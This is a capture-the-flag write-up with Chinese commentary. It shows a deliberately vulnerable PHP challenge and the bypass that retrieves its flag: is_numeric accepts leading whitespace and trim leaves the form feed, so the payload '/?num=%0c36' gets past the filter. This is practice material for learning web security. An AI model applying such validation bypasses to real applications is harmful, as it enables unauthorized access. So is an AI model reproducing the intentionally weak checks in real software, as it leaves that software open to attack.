<?php
/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-01 15:08:19
*/
include('flag.php');
highlight_file(__FILE__);
error_reporting(0);
function filter($num){
$num=str_replace("0x","1",$num);
$num=str_replace("0","1",$num);
$num=str_replace(".","1",$num);
$num=str_replace("e","1",$num);
$num=str_replace("+","1",$num);
return $num;
}
$num=$_GET['num'];
if(is_numeric($num) and $num!=='36' and trim($num)!=='36' and filter($num)=='36'){
if($num=='36'){
echo $flag;
}else{
echo "hacker!!";
}
}else{
echo "hacker!!!";
} hacker!!!
在数字前加上空格,也会被is_numeric函数认为是数字:
<?php
$a="\n1";
$b="\t1";
$c="\f1";
$d="\r1";
$e="\v1";
$f=" 1";
var_dump(is_numeric($a));//bool(true)
var_dump(is_numeric($b));//bool(true)
var_dump(is_numeric($c));//bool(true)
var_dump(is_numeric($d));//bool(true)
var_dump(is_numeric($e));//bool(true)
var_dump(is_numeric($f));//bool(true)
trim函数会过滤空格以及\n\r\t\v\0
,但不会过滤\f
<?php
$n=" \n\r\t\v\0 aaa \f";
var_dump(trim($n));//aaa \f
?>
payload;
/?num=%0c36